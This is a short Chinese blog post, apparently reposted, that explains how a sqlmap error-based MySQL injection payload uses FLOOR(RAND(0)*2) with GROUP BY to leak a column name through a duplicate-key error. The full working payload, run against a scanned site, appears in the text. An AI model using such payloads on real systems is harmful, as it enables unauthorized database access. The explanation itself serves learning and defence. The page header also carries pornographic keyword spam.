日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

关于mysql的error-based injection payload

發布時間:2024/4/14 数据库 36 豆豆
生活随笔 收集整理的這篇文章主要介紹了 关于mysql的error-based injection payload 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

今天用sqlmap掃一個網站,想得到一個表的所有列名,注意到sqlmap用到的一個error-based payload的:

?

1 AND (SELECT 3174 FROM(SELECT COUNT(*),CONCAT(0x71666f7771,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x73797374656d AND table_schema=0x68646d303334303337335f6462 LIMIT 0,1),0x7165767371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

?

sqlmap通過這句話最終得到了一個叫“system”的表的一個叫“id”的列的列名(也就是“id”:)

好奇這個sql語句是怎么實現這個功能的。

第一眼看到這個sql語句真心是一頭霧水,在vim里面展開,并在目標機器上跑了一下,發現會報一個

錯誤:Duplicate entry 'qfowqidqevsq1' for key 'group_key' (1062)

這個錯誤的entry就包含著要得到的列名“id”,原來這就是傳說中error-based的意思,就是通過讓目標機器的mysql server報錯,來獲取對應的信息。

通過分析,造成這個錯誤的原因主要在于那個concat()最后的floor(rand(0)*2),這個東西每次隨即產生的值不同會導致group by的key不唯一,所以就報錯了。真心是妙招。

?

隨便google了一下,找到這么一個網頁,有一些專門相關的介紹

http://zentrixplus.net/blog/sql-injection-error-based-double-query/

轉載于:https://www.cnblogs.com/flyFreeZn/p/3421510.html

總結

以上是生活随笔為你收集整理的关于mysql的error-based injection payload的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。